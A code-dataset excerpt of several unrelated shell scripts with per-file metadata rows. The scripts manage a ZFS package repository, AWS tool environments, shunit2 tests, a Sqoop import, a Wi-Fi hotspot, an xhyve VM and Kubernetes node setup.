    if [[ ${dry_run} -eq 1 ]]; then
        dry="-n"
    fi
    run_cmd "mkdir -p ${repo_basepath}/archive_${repo_basename}-testing"
    run_cmd "rsync -vrtlh --delete-before ${remote_login}:${repo_remote_basepath}/${repo_basename}-testing ${repo_basepath}/ ${dry}"
    run_cmd_check 1 "Could not pull packages from remote testing repo!"
}
# Build ${package_list} ("name;version;path;dest" entries) from the built
# package files under packages/${kernel_name}, filtering by the expected
# version and skipping packages already present in ${repo_target}.
# Also collects source tarballs and debug packages into ${package_src_list}.
repo_package_list() {
    msg "Generating a list of packages to add..."
    debug_print_array "pkg_list" "${pkg_list[@]}"
    package_list=()
    local pkgs=()
    # Build a find-compatible brace expression from the package names.
    if [[ ${#pkg_list[@]} -eq 1 ]]; then
        local pkg_list_find=${pkg_list[0]}
    else
        local pkg_list_find="{$(printf '%s,' ${pkg_list[@]} | cut -d ',' -f 1-${#pkg_list[@]})}"
    fi
    # Get packages from the backup directory
    path="packages/${kernel_name}/${pkg_list_find}/"
    if [[ ! -z ${kernel_version_pkgver} ]]; then
        debug "kernel_version_pkgver: ${kernel_version_pkgver}"
        fcmd="find ${path} -iname '*${kernel_version_pkgver}-${zfs_pkgrel}*.pkg.tar.zst' "
        run_cmd_no_output_no_dry_run "${fcmd}"
        for pkg in ${run_cmd_output}; do
            pkgs+=(${pkg})
        done
    elif [[ ! -z ${zfs_pkgver} ]]; then
        debug "zfs_pkgver: ${zfs_pkgver}"
        fcmd="find ${path} -iname '*${zfs_pkgver}-${zfs_pkgrel}*.pkg.tar.zst' "
        run_cmd_no_output_no_dry_run "${fcmd}"
        for pkg in ${run_cmd_output}; do
            pkgs+=(${pkg})
        done
    else
        debug "kernel_version_pkgver and zfs_pkgver not set!"
        debug "Falling back to newest package by mod time for zfs"
        for z in $(printf '%s ' ${pkg_list[@]} ); do
            fcmd="find packages/${kernel_name} -iname '*${z}*.pkg.tar.zst' -printf '%T@ %p\\n' | sort -n | tail -2 | cut -f2- -d' '"
            run_cmd_no_output_no_dry_run "${fcmd}"
            for pkg in ${run_cmd_output}; do
                pkgs+=(${pkg})
            done
        done
    fi
    debug_print_array "pkgs" ${pkgs[@]}
    for pkg in ${pkgs[@]}; do
        arch=$(package_arch_from_path ${pkg})
        name=$(package_name_from_path ${pkg})
        vers=$(package_version_from_path ${pkg})
        # Non -git packages must match the expected version string exactly.
        if ! [[ ${name} =~ .*-git ]]; then
            # Version match check: arch: x86_64 name: spl-utils-linux-git vers: 0.7.0_rc1_r0_g4fd75d3_4.7.2_1-4 vers_match: 0.6.5.8.*4.7.2_1-4
            debug "zfs_pkgver: ${zfs_pkgver}"
            debug "kernel_version_pkgver: ${kernel_version_pkgver}"
            kernvers=""
            # append kernel version if set
            if [ ! -z "${kernel_version_pkgver}" ]; then
                kernvers="_${kernel_version_pkgver}";
            fi
            if [[ ${pkg} =~ .*zfs-.* ]]; then
                match="${zfs_pkgver}${kernvers}-${zfs_pkgrel}"
            fi
            debug "Version match check: arch: ${arch} name: ${name} vers: ${vers} vers_match: ${match}"
            if ! [[ ${vers} =~ ^${match} ]] ; then
                debug "Version mismatch!"
                continue
            fi
        fi
        # check if package version is already in repo
        if [ -f "${repo_target}/${arch}/${name}-${vers}-${arch}.pkg.tar.zst" ]; then
            msg2 "Package ${name}=${vers} already in repo. Skipping"
            continue
        fi
        debug "Using: pkgname: ${name} pkgver: ${vers} pkgpath: ${pkg} pkgdest: ${repo_target}/${arch}"
        # The chroot_local repo is flat (no per-arch subdirectory).
        if [[ ${repo_name} == "chroot_local" ]]; then
            package_list+=("${name};${vers};${pkg};${repo_target}")
        else
            package_list+=("${name};${vers};${pkg};${repo_target}/${arch}")
        fi
        pkgsrc="packages/${kernel_name}/${name}/${name}-${vers}.src.tar.gz"
        if [[ -f "${pkgsrc}" ]]; then
            package_src_list+=("${pkgsrc}")
        fi
        # Bugfix: this block previously re-tested and re-appended ${pkgsrc}
        # (copy-paste error), so debug packages were never collected.
        pkgdbg="packages/${kernel_name}/${name}/${name}-debug-${vers}-${arch}.pkg.tar.zst"
        if [[ -f "${pkgdbg}" ]]; then
            package_src_list+=("${pkgdbg}")
        fi
    done
    debug_print_array "package_list" ${package_list[@]}
    debug_print_array "package_src_list" ${package_src_list[@]}
}
# Find versions of the packages in ${package_list} that are already published
# in ${repo_target} and move them (plus their .sig files, via the trailing
# glob) into ${package_backup_dir} so repo_add can install the new builds.
repo_package_backup() {
    msg "Getting a list of packages to backup..."
    local pkgs=()
    # Build one find expression per package, OR-ed together with -o.
    for ipkg in ${package_list[@]}; do
        IFS=';' read -a pkgopt <<< "${ipkg}"
        name="${pkgopt[0]}"
        vers="${pkgopt[1]}"
        pkgp="${pkgopt[2]}"
        dest="${pkgopt[3]}"
        debug "pkg: ${name}"
        local o=""
        if [[ ${#pkgs[@]} -ne 0 ]]; then
            local o="-o"
        fi
        pkgs+=("$o -regextype egrep -regex '.*${name}-[a-z0-9\.\_]+-[0-9]+-x86_64.pkg.tar.(xz|zst)'")
    done
    # only run find, if new packages will be copied
    if [[ ! ${#pkgs[@]} -eq 0 ]]; then
        run_cmd_show_and_capture_output_no_dry_run "find ${repo_target} -type f ${pkgs[@]}"
        for x in ${run_cmd_output}; do
            debug "Evaluating ${x}"
            pkgname=$(package_name_from_path ${x})
            pkgvers=$(package_version_from_path ${x})
            debug "pkgname: ${pkgname}"
            debug "pkgvers: ${pkgvers}"
            # asterisk globs the package signature
            epkg="${repo_target}/x86_64/${pkgname}-${pkgvers}*"
            debug "backing up package: ${epkg}"
            package_exist_list+=("${epkg}")
        done
    fi
    if [[ ${#package_exist_list[@]} -eq 0 ]]; then
        msg2 "No packages found for backup."
        return
    fi
    debug_print_array "package_exist_list" "${package_exist_list[@]}"
    msg "Backing up existing packages..."
    run_cmd "mv ${package_exist_list[@]} ${package_backup_dir}/"
}
# Copy the packages in ${package_list} (plus their .sig files and sources)
# into the repo directory and register them with repo-add. For the
# chroot_local target this also wires the repo into the chroot's pacman.conf.
repo_add() {
    if [[ ${#package_list[@]} == 0 ]]; then
        error "No packages to process!"
        return
    fi
    debug_print_array "package_list" ${#package_list}
    local pkg_cp_list=()
    local pkg_add_list=()
    local dest=""
    local arch="x86_64"
    # Split each "name;vers;path;dest" entry and collect copy/add targets.
    for ipkg in ${package_list[@]}; do
        IFS=';' read -a pkgopt <<< "${ipkg}"
        name="${pkgopt[0]}"
        vers="${pkgopt[1]}"
        pkgp="${pkgopt[2]}"
        dest="${pkgopt[3]}"
        msg2 "Processing package ${name}-${vers} to ${dest}"
        [[ ! -d ${dest} ]] && run_cmd "mkdir -p ${dest}"
        debug "name: ${name} vers: ${vers} pkgp: ${pkgp} dest: ${dest}"
        pkg_cp_list+=("${pkgp}")
        pkg_cp_list+=("${pkgp}.sig")
        bname=$(basename ${pkgp})
        pkg_add_list+=("${dest}/${bname}")
        all_added_pkgs+=("${bname}")
    done
    debug_print_array "pkg_cp_list" "${pkg_cp_list[@]}"
    debug_print_array "pkg_add_list" "${pkg_add_list[@]}"
    msg "Copying the new ${arch} packages to the repo..."
    if [[ ${repo_name} == "chroot_local" ]]; then
        run_cmd "cp -fv ${pkg_cp_list[@]} ${package_src_list[@]} ${repo_target}/"
    else
        run_cmd "cp -fv ${pkg_cp_list[@]} ${package_src_list[@]} ${repo_target}/${arch}/"
    fi
    if [[ ${run_cmd_return} -ne 0 ]]; then
        error "An error occurred copying the packages to the repo!"
        exit 1
    fi
    if [[ ${repo_name} == "chroot_local" ]]; then
        run_cmd "repo-add ${repo_target}/${repo_name}.db.tar.gz ${pkg_add_list[@]}"
        # append the local repo to the chroot's pacman.conf
        repo_root=$(dirname ${repo_target})
        if [[ -z $(grep clean-chroot ${repo_root}/etc/pacman.conf) ]]; then
            # add a local repo to chroot
            run_cmd_no_output "sed -i '/\\\[testing\\\]/i # Added by clean-chroot-manager\\\n\\\[chroot_local\\\]\\\nSigLevel = Never\\\nServer = file:///repo\\\n' ${repo_root}/etc/pacman.conf $(realpath ${repo_root}/../)/${makepkg_nonpriv_user}/etc/pacman.conf"
        fi
        run_cmd_no_output "sudo rsync --chown=${makepkg_nonpriv_user}: -ax ${repo_root}/repo/ $(realpath ${repo_root}/../)/${makepkg_nonpriv_user}/repo/"
    else
        # Published repos use a signed database (-k/-s) unlike chroot_local.
        run_cmd "repo-add -k ${gpg_sign_key} -s -v ${repo_target}/${arch}/${repo_name}.db.tar.xz ${pkg_add_list[@]}"
    fi
    if [[ ${run_cmd_return} -ne 0 ]]; then
        error "An error occurred adding the package to the repo!"
        exit 1
    fi
}
# Create a detached GPG signature (<pkg>.sig) for every package in
# ${package_list} that does not already have one. Note: shares its name with
# the ${sign_packages} flag variable; bash keeps those namespaces separate.
sign_packages() {
    if [[ ${#package_list[@]} == 0 ]]; then
        error "No packages to process!"
        return
    fi
    for ipkg in "${package_list[@]}"; do
        IFS=';' read -a pkgopt <<< "${ipkg}"
        name="${pkgopt[0]}"
        vers="${pkgopt[1]}"
        pkgp="${pkgopt[2]}"
        dest="${pkgopt[3]}"
        if [[ ! -f "${pkgp}.sig" ]]; then
            msg2 "Signing ${pkgp}"
            # GPG_TTY prevents "gpg: signing failed: Inappropriate ioctl for device"
            if [[ "$(tty)" == "not a tty" ]]; then
                tty=""
            else
                tty="GPG_TTY=$(tty) "
            fi
            run_cmd_no_output "${tty}gpg --batch --yes --detach-sign --use-agent -u ${gpg_sign_key} \"${script_dir}/${pkgp}\""
            if [[ ${run_cmd_return} -ne 0 ]]; then
                exit 1
            fi
        fi
    done
}
# Remove the packages named in ${modes[@]} from the repo: matching files are
# moved to ${package_backup_dir} first, then unregistered with repo-remove.
# Shares its name with the ${remove_packages} flag variable (separate
# namespaces in bash).
remove_packages() {
    # get a list of packages to backup
    local pkgs=()
    for (( i = 0; i < ${#modes[@]}; i++ )); do
        package=${modes[i]}
        local o=""
        if [[ ${#pkgs[@]} -ne 0 ]]; then
            local o="-o"
        fi
        pkgs+=("$o -regextype egrep -regex '.*/${package}-[a-z0-9\.\_]+-[0-9]+-x86_64.pkg.tar.(zst|xz)'")
    done
    # only run find, if ackages were found
    if [[ ! ${#pkgs[@]} -eq 0 ]]; then
        run_cmd_show_and_capture_output_no_dry_run "find ${repo_target} -type f ${pkgs[@]}"
        for x in ${run_cmd_output}; do
            debug "Evaluating ${x}"
            pkgname=$(package_name_from_path ${x})
            pkgvers=$(package_version_from_path ${x})
            debug "pkgname: ${pkgname}"
            debug "pkgvers: ${pkgvers}"
            # asterisk globs the package signature
            epkg="${repo_target}/x86_64/${pkgname}-${pkgvers}*"
            debug "backing up package: ${epkg}"
            package_exist_list+=("${epkg}")
        done
    fi
    if [[ ${#package_exist_list[@]} -eq 0 ]]; then
        msg2 "No packages found for backup."
        return
    fi
    debug_print_array "package_exist_list" "${package_exist_list[@]}"
    msg "Backing up packages..."
    run_cmd "mv ${package_exist_list[@]} ${package_backup_dir}/"
    # remove packages from repo
    local arch="x86_64"
    local pkg_remove_list=()
    for (( i = 0; i < ${#modes[@]}; i++ )); do
        package=${modes[i]}
        pkg_remove_list+=("${package}")
    done
    msg "Removing packages from repo"
    run_cmd "repo-remove -k ${gpg_sign_key} -s -v ${repo_target}/${arch}/${repo_name}.db.tar.xz ${pkg_remove_list[@]}"
}
msg "$(date) :: ${script_name} started..."
# The abs path to the repo
if [[ ${repo_name} == "clean-chroot-manager" ]]; then
    repo_name="chroot_local"
    repo_target="$(dirname ${chroot_path})/root/repo"
    if [[ ! -d ${repo_target} ]]; then
        # XXX: NEED TO TEST THIS
        run_cmd_no_output_no_dry_run "sudo mkdir -p ${repo_target} && sudo chown ${makepkg_nonpriv_user}: -R ${repo_target}"
    fi
else
    repo_target=${repo_basepath}/${repo_name}
fi
debug "repo_name: ${repo_name}"
debug "repo_target: ${repo_target}"
# Main dispatch: either remove packages, or (optionally) pull the remote
# repo, then sign-only or sign-and-add per selected mode/kernel.
if [[ ${remove_packages} -eq 1 ]]; then
    remove_packages
else
    if [[ ${pull_remote_repo} -eq 1 ]] && [[ ${no_pull_remote} -ne 1 ]]; then
        pull_repo
    fi
    if [[ ${pull_remote_testing_repo} -eq 1 ]] && [[ ${no_pull_remote} -ne 1 ]]; then
        pull_testing_repo
    fi
    # -s: sign the built packages for each mode/kernel, then exit without
    # touching the repo database.
    if [[ ${sign_packages} -eq 1 ]]; then
        for (( i = 0; i < ${#modes[@]}; i++ )); do
            mode=${modes[i]}
            kernel_name=${kernel_names[i]}
            get_kernel_update_funcs
            debug_print_default_vars
            export script_dir mode kernel_name
            source_safe "src/kernels/${kernel_name}.sh"
            export zfs_pkgver=""
            for func in ${update_funcs[@]}; do
                debug "Evaluating '${func}'"
                "${func}"
                repo_package_list
                sign_packages
            done
        done
        exit 0
    fi
    # Normal path: for each mode/kernel, enumerate packages, back up the
    # replaced ones, sign, and add to the repo database.
    for (( i = 0; i < ${#modes[@]}; i++ )); do
        mode=${modes[i]}
        kernel_name=${kernel_names[i]}
        get_kernel_update_funcs
        debug_print_default_vars
        export script_dir mode kernel_name
        source_safe "src/kernels/${kernel_name}.sh"
        export zfs_pkgver=""
        for func in ${update_funcs[@]}; do
            debug "Evaluating '${func}'"
            "${func}"
            repo_package_list
            if [[ ${repo_name} != "chroot_local" ]]; then
                repo_package_backup
            fi
            sign_packages
            repo_add
        done
    done
    if [[ ${#all_added_pkgs[@]} -gt 0 ]]; then
        msg2 "${#all_added_pkgs[@]} packages were added to the repo:"
        printf '%s\n' "${all_added_pkgs[@]}"
    else
        msg2 "No packages were added to the repo"
    fi
fi
if [[ ${haz_error} -ne 0 ]]; then
    warning "An error has been detected! Inspect output above closely..."
fi
| true
|
8cbf30d359e8e1bb517dc742347a72f52760b427
|
Shell
|
avkovalevs/aws-pg
|
/roles/pgpool/files/aws-apitools-common.sh
|
UTF-8
| 832
| 3.375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# Environment setup for the AWS API tools (intended to be sourced, not run).
# Set path for AWS API tools packages
export AWS_PATH=/opt/aws
export PATH=$PATH:$AWS_PATH/bin

# Choose a JAVA_HOME only when the caller has not already set one; a
# third-party JDK under /usr/java/latest takes priority over the distro JVMs.
if [ -z "${JAVA_HOME}" ]; then
  for jdk_candidate in /usr/java/latest /usr/lib/jvm/java /usr/lib/jvm/jre; do
    if [ -d "$jdk_candidate" ]; then
      export JAVA_HOME=$jdk_candidate
      break
    fi
  done
  unset jdk_candidate
fi

# Source environment variables for each set of tools (each installed tool is
# a symlink directly under the apitools/amitools directories).
for tool_dir in $(find /opt/aws/apitools /opt/aws/amitools -maxdepth 1 -type l 2>/dev/null); do
  [ -e "$tool_dir/environment.sh" ] && . "$tool_dir/environment.sh"
done
unset tool_dir

# Uncomment this line to specify AWS_CREDENTIAL_FILE
# (see /opt/aws/credential-file-path.template)
#export AWS_CREDENTIAL_FILE=/opt/aws/credentials.txt
| true
|
f9a701830a406928202eeef5800b3ef1eaa97401
|
Shell
|
boxnos/hashedpotatoes
|
/test/test.sh
|
UTF-8
| 414
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/sh
# shunit2 tests for the 'hashed' binary: path hashing ("~alias") and
# unhashing, driven by the fixtures in test/hashes.zsh.
file=test/hashes.zsh
cmdf="./hashed -f $file"
# A home-relative path collapses to its ~alias.
test_hash () {
  assertEquals '~src/vim' $($cmdf $HOME/src/vim)
}
# -u expands a ~alias back to the absolute path.
test_unhash() {
  assertEquals $HOME/src/vim $($cmdf -u '~src/vim')
}
# -un accepts multiple aliases as arguments, one result per line.
test_muluti() {
  assertEquals "$HOME/src/vim
$HOME/bin" "$($cmdf -un '~src/vim' '~bin')"
}
# -un also reads aliases from stdin when none are given as arguments.
test_pipe() {
  assertEquals "$HOME/src/vim
$HOME/bin" "$(echo '~src/vim
~bin' | $cmdf -un)"
}
. /usr/share/shunit2/shunit2
| true
|
4b494c831ea01d88345181e638447b17e0135809
|
Shell
|
rootAir/big-data-projects
|
/sqoop-examples/Sqoop_import/basic_imports/sqoop_import_split_by_string.sh
|
UTF-8
| 710
| 2.609375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Sqoop import example: splitting on a string (text) column requires the
# org.apache.sqoop.splitter.allow_text_splitter property to be enabled.
# This query fails
# (the :'...' below is a no-op command with a quoted argument, used here as a
# block comment to keep the failing example around without executing it)
:'
sqoop import \
--connect jdbc:mysql://db.hostname.com:3306/db \
--username user \
-P \
--table table_name \
--warehouse-dir /user/karthik/sqoop_import/db \
--split-by string_column_name
'
# The below query works
# The reason is by default splitting across a String column is disabled
# The -D control argument is needed to make the text splitter to true
# This then makes the split-by work on the text column.
sqoop import \
-Dorg.apache.sqoop.splitter.allow_text_splitter=true \
--connect jdbc:mysql://db.hostname.com:3306/db \
--username user \
-P \
--table table_name \
--warehouse-dir /user/karthik/sqoop_import/db \
--split-by string_column_name
| true
|
8518ca2df963ee7c6c54aa3175ec3d7a6b08d4f0
|
Shell
|
msoe-sisyphus-sd/msoe-sisbot
|
/start_hotspot.sh
|
UTF-8
| 2,204
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Configure and start the Wi-Fi hotspot (hostapd + isc-dhcp-server); an
# optional WPA passphrase may be given as $1 (8+ characters).

# comment/uncomment line in file
#   comment KEY true  FILE  -> comment out lines beginning with KEY
#   comment KEY false FILE  -> uncomment lines beginning with #KEY
# Implemented as an embedded Lua filter writing FILE.tmp, which then replaces
# FILE in place (via sudo). The heredoc delimiter is unquoted, so the Lua
# source must avoid shell-expandable '$' sequences.
comment() {
  lua - "$1" "$2" "$3" <<EOF > "$3.tmp"
local key=assert(arg[1])
local search=key:match("")
local value=assert(arg[2])
local fn=assert(arg[3])
local file=assert(io.open(fn))
local made_change=false
for line in file:lines() do
  if value=="true" then
    if line:match("^%s*"..key..".*") then
      line="#"..line:gsub("%%","")
    end
  else
    if line:match("^#%s*"..key..".*") then
      line=line:sub(2):gsub("%%","")
    end
  end
  print(line)
end
EOF
  sudo mv "$3.tmp" "$3"
}
# replace line in file (also uncomments)
#   replace KEY VALUE FILE -> any line beginning with KEY or #KEY is replaced
#   wholesale with VALUE. Same embedded-Lua filter technique as comment().
replace() {
  lua - "$1" "$2" "$3" <<EOF > "$3.tmp"
local key=assert(arg[1])
local search=key:match("")
local value=assert(arg[2])
local fn=assert(arg[3])
local file=assert(io.open(fn))
for line in file:lines() do
  if line:match("^#?%s*"..key..".*") then
    line=value:gsub("%%","")
  end
  print(line)
end
EOF
  sudo mv "$3.tmp" "$3"
}
# Take wlan0 down and switch the interface configuration to hotspot mode.
sudo ifdown wlan0
# make sure services are down (in case of restart)
sudo service hostapd stop
sudo service isc-dhcp-server stop
sudo cp /etc/network/interfaces.hotspot /etc/network/interfaces
sudo cp /etc/wpa_supplicant/wpa_supplicant.conf.bak /etc/wpa_supplicant/wpa_supplicant.conf # clear wpa_supplicant
# set password if given
size=${#1}
if [ -n "$1" ] && [ "$size" -gt 7 ]; then
  # Passphrase supplied (WPA requires 8+ chars): enable WPA2-PSK in hostapd.
  comment 'wpa=2' false /etc/hostapd/hostapd.conf
  replace "wpa_passphrase=" "wpa_passphrase=$1" /etc/hostapd/hostapd.conf
  # needs to be WPA-PSK
  replace 'wpa_key_mgmt=WPA' 'wpa_key_mgmt=WPA-PSK' /etc/hostapd/hostapd.conf
  comment 'wpa_pairwise=CCMP' false /etc/hostapd/hostapd.conf
  comment 'wpa_group_rekey=86400' false /etc/hostapd/hostapd.conf
else
  # No (valid) passphrase: run an open AP by commenting out all WPA settings.
  comment 'wpa=2' true /etc/hostapd/hostapd.conf
  # reset to sisyphus, and comment out
  replace 'wpa_passphrase=' '#wpa_passphrase=sisyphus' /etc/hostapd/hostapd.conf
  comment 'wpa_key_mgmt=WPA' true /etc/hostapd/hostapd.conf
  comment 'wpa_pairwise=CCMP' true /etc/hostapd/hostapd.conf
  comment 'wpa_group_rekey=86400' true /etc/hostapd/hostapd.conf
fi
# Bring the interface back up and start the AP + DHCP services.
sudo ifup wlan0
#sudo ifconfig wlan0 192.168.42.1
sudo systemctl daemon-reload
sudo service hostapd start
sudo service isc-dhcp-server start
echo "Hotspot enabled"
| true
|
4b8036c62dddb487420495191eb1c2c3a7657e60
|
Shell
|
foxxifu/my-ids
|
/tools/bin/stop_biz.sh
|
UTF-8
| 312
| 2.796875
| 3
|
[] |
no_license
|
#! /bin/bash
# Stop the ids-biz process by matching the "Proc=ids-biz" marker on its
# command line.
PROC_BIZ='ids-biz'

stop_biz()
{
    # pgrep -f matches against the full command line and never matches its
    # own process, replacing the fragile
    # `ps -ef --columns 2000 | grep | grep -v grep | wc -l / awk` pipelines.
    local bizids
    bizids=$(pgrep -f "Proc=${PROC_BIZ}")
    if [ -n "${bizids}" ]
    then
        # NOTE(review): SIGKILL kept from the original; a TERM-first shutdown
        # would allow graceful cleanup — confirm before changing.
        sudo /bin/kill -9 ${bizids}
        sleep 1
    fi
}

stop_biz
| true
|
46baa587eb47987a2a86b5d49be7c51205008365
|
Shell
|
DannyGH/AzureIoT
|
/extras/sync-sdk.sh
|
UTF-8
| 1,129
| 3.765625
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/bin/sh
# Copyright (c) Arduino. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
# Sync Azure IoT SDK sources from a local SDK checkout ($1) into this repo's
# src/ and examples/ trees, and record the SDK's git metadata.
SDK_DIR=$1
SRC_SDK_DIR=../src/sdk
EXAMPLES_SDK_DIR=../examples/sdk
SDK_METADATA=$SRC_SDK_DIR/metadata.txt
# The SDK directory argument is mandatory and must exist.
if [ -z "$SDK_DIR" ]
then
  echo "Please specify Azure SDK directory as command line argument!"
  exit 1
fi
if [ ! -d "$SDK_DIR" ]
then
  echo "'$SDK_DIR' does not exist!"
  exit 1
fi
# Copy each file named in list file $1 (one name per line) from source
# directory $2 into destination directory $3, echoing each name indented by
# a tab as it is copied.
copy_filelist() {
  # Read lines instead of word-splitting `cat $1` so names survive intact,
  # and use printf: the original `echo "\t$file"` is shell-dependent (bash
  # prints a literal backslash-t, dash prints a tab).
  while IFS= read -r file
  do
    [ -n "$file" ] || continue   # skip blank lines, as the old loop did
    printf '\t%s\n' "$file"
    cp "$2/$file" "$3"
  done < "$1"
}
echo "Copying SDK C source files over"
copy_filelist "sdk-files.txt" "$SDK_DIR" "$SRC_SDK_DIR"
echo "Copying SDK sample files over"
copy_filelist "iothub-client-sample-http-files.txt" "$SDK_DIR" "$EXAMPLES_SDK_DIR/iothub_client_sample_http"
copy_filelist "simplesample-http-files.txt" "$SDK_DIR" "$EXAMPLES_SDK_DIR/simplesample_http"
echo "Storing SDK metadata"
# Metadata file: line 1 = remote URL, line 2 = branch name, line 3 = commit.
git --git-dir "$SDK_DIR/.git" ls-remote --get-url > "$SDK_METADATA"
git --git-dir "$SDK_DIR/.git" rev-parse --abbrev-ref HEAD >> "$SDK_METADATA"
git --git-dir "$SDK_DIR/.git" rev-parse HEAD >> "$SDK_METADATA"
cat $SDK_METADATA
| true
|
8cb1a53292918082cdb577fa1e69ae0f63e805f8
|
Shell
|
mipsum/underworld
|
/vm/run.sh
|
UTF-8
| 497
| 2.53125
| 3
|
[] |
no_license
|
# Boot the FreeBSD VM under xhyve, creating the disk image first if needed.
[ -f "./hdd.img" ] || {
  echo 'creating vm first'
  sh ./create.sh
}
# Bugfix: this fixed UUID was previously assigned to a variable named D while
# the xhyve command referenced the unset $UUID, so the -U flag was silently
# dropped and the guest got a new UUID on every boot.
UUID="-U deaddead-dead-dead-dead-deaddeaddead"
USERBOOT="$HOME/Library/Caches/Homebrew/xhyve--git/test/userboot.so"
BOOTVOLUME="hdd.img"
KERNELENV=""
MEM="-m 2G"                          # guest RAM
SMP="-c 2"                           # virtual CPUs
PCI_DEV="-s 0:0,hostbridge -s 31,lpc"
NET="-s 2:0,virtio-net"
IMG_HDD="-s 4:0,virtio-blk,$BOOTVOLUME"
LPC_DEV="-l com1,stdio"              # serial console on stdio
ACPI="-A"
sudo xhyve $ACPI $MEM $SMP $PCI_DEV $LPC_DEV $NET $IMG_HDD $UUID -f fbsd,$USERBOOT,$BOOTVOLUME,"$KERNELENV"
exit 0
| true
|
d7850650f68f59fdb1513deae506328aff7825b3
|
Shell
|
gandazgul/k8s-infrastructure
|
/install-k8s/configNode.sh
|
UTF-8
| 4,817
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Prepare a Fedora host as a Kubernetes node: install cri-o + crun, configure
# cri-o, install kubelet/kubeadm/kubectl, enable cockpit, disable swap and the
# firewall, and set the kernel networking knobs Kubernetes needs.
# Must be run as a regular user with sudo rights (not as root).
if [[ $EUID = 0 ]]; then
    printf "Don't run this script as root"
    exit 1
fi
if ! dnf list installed cri-o > /dev/null 2>&1; then
    printf "\nInstall cri-o and crun ================================================================================\n"
    sudo dnf -y module enable cri-o:1.24 || exit 1
    sudo dnf -y install crun cri-o || exit 1
    sudo dnf update --exclude="cri-*" || exit 1
    printf "\nRaising user watches to the highest number to allow kubelet to work with lots of containers ===========\n"
    echo fs.inotify.max_user_watches=1048576 | sudo tee --append /etc/sysctl.conf
    echo fs.inotify.max_user_instances=1048576 | sudo tee --append /etc/sysctl.conf
fi;
# Only rewrite crio.conf when crun is not already the default runtime.
cat /etc/crio/crio.conf | grep default_runtime | grep crun
GREP_RE=$?
if [ $GREP_RE != 0 ]; then
    printf "\nChange cri-o's config to work with crun ===============================================================\n"
    sudo sed -c -i "s/\(default_runtime *= *\).*/\1\"crun\"/" /etc/crio/crio.conf || exit 1
    echo "[crio.runtime.runtimes.crun]" | sudo tee --append /etc/crio/crio.conf || exit 1
    echo "runtime_path = \"/usr/bin/crun\"" | sudo tee --append /etc/crio/crio.conf || exit 1
    echo "runtime_type = \"oci\"" | sudo tee --append /etc/crio/crio.conf || exit 1
    echo "runtime_root = \"/run/crun\"" | sudo tee --append /etc/crio/crio.conf || exit 1
    printf "\nEnable cri-o ==========================================================================================\n"
    sudo systemctl daemon-reload || exit 1
    sudo systemctl enable --now crio || exit 1
    sudo systemctl start crio || exit 1
    printf "\nVerify cri-o is running ===============================================================================\n"
    if ! systemctl is-active --quiet crio >/dev/null 2>&1; then
        printf "\nSomething failed while installing cri-o please verify that is running and run this script again"
        exit 1
    fi;
fi;
printf "\nInstalling Kubernetes packages from repo ==================================================================\n"
# The repo file doubles as the "already installed" marker for this section.
if [[ ! -f /etc/yum.repos.d/kubernetes.repo ]]; then
    printf "\nInstall kubelet, kubeadm, crictl(needed by kubelet), cockpit (nice fedora dashboard):"
    sudo bash -c 'cat <<EOF > /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
exclude=kube*
[kubernetes-unstable]
name=Kubernetes-unstable
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64-unstable
enabled=0
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
exclude=kube*
EOF'
    sudo dnf -y install --enablerepo=kubernetes kubelet-1.24.11-0 kubectl-1.24.11-0 kubeadm-1.24.11-0 --disableexcludes=kubernetes || exit 1
    sudo dnf -y install cockpit-pcp || exit 1
    # enable cni plugins
    sudo mkdir -p /opt/cni/
    sudo ln -s /usr/libexec/cni/ /opt/cni/bin
fi;
printf "\nEnabling cockpit ==========================================================================================\n"
sudo systemctl enable --now cockpit.socket || exit 1
# kubelet requires swap to be off; Fedora ships zram swap by default.
if dnf list installed zram-generator-defaults > /dev/null 2>&1; then
    printf "\nDisabling swap ==========================================================================================\n"
    sudo dnf -y remove zram-generator-defaults
    sudo systemctl stop swap-create@zram0 || exit 1
    sudo swapoff /dev/zram0 || exit 1
fi
if systemctl is-active --quiet firewalld >/dev/null 2>&1; then
    printf "\nDisabling the firewall ================================================================================\n"
    sudo systemctl stop firewalld
    sudo systemctl disable firewalld
    # fedora 29 complained that uninstalling firewalld would uninstall kernel-core
    # sudo dnf -y remove firewalld
    # Masking prevents the service from ever being started
    sudo systemctl mask firewalld.service
    # needed for cri-o
    sudo modprobe overlay
    # enable iptables in the kernel
    sudo modprobe br_netfilter
    cat <<EOF | sudo tee /etc/modules-load.d/crio.conf
overlay
br_netfilter
EOF
    # Enable ipv4 forwarding
    echo 1 | sudo tee --append /proc/sys/net/ipv4/ip_forward
    # This ensures all network traffic goes through iptables
    echo 1 | sudo tee --append /proc/sys/net/bridge/bridge-nf-call-iptables
    # same as above?
    cat <<EOF | sudo tee /etc/sysctl.d/99-kubernetes-cri.conf
net.bridge.bridge-nf-call-iptables  = 1
net.ipv4.ip_forward                 = 1
net.bridge.bridge-nf-call-ip6tables = 1
EOF
    # make the above settings take effect now
    sudo sysctl --system
fi;
| true
|
c199a027e81b9305732c15bc69739d5fb8ca7bb6
|
Shell
|
nabto/unabto-jorjin-sdk
|
/Make.sh
|
UTF-8
| 553
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# This script clears the terminal, displays a greeting and copies the
# relevant files from the uNabto submodule. It then deletes the remaining files.
clear # clear terminal window
echo "The script starts now."

# Create the destination directories up front.
mkdir -p src/modules/crypto/generic/ src/platforms/

# Pull the core sources, the generic crypto module and the common types
# header out of the submodule checkout.
cp -R unabto/src/unabto/. src/unabto/
cp -R unabto/src/modules/crypto/generic/. src/modules/crypto/generic/
